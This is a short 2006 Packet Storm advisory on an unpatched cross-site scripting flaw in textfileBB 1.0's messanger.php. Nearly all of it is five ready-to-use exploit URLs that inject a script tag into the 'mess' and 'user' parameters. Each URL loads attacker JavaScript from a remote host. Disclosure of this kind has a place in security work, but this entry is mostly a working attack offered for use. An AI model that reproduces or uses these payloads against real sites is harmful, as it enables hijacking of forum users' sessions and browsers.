textfilebbmessanger.txt

2006-03-09T00:00:00
ID PACKETSTORM:44506
Type packetstorm
Reporter retard
Modified 2006-03-09T00:00:00

Description

                                        
                                            `ORIGIONAL: http://notlegal.ws/textfilebbmessanger.txt  
  
  
software: textfileBB  
vendors website: http://tfbb.jcink.com/  
versions: <= 1.0  
class: remote  
status: unpatched  
exploit: available  
solution: not available  
discovered by: retard  
risk level: medium  
  
exploit(s):  
  
http://example.com/messanger.php?mess=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E  
  
credit:  
  
author(s): retard  
email: retard@30gigs.com  
`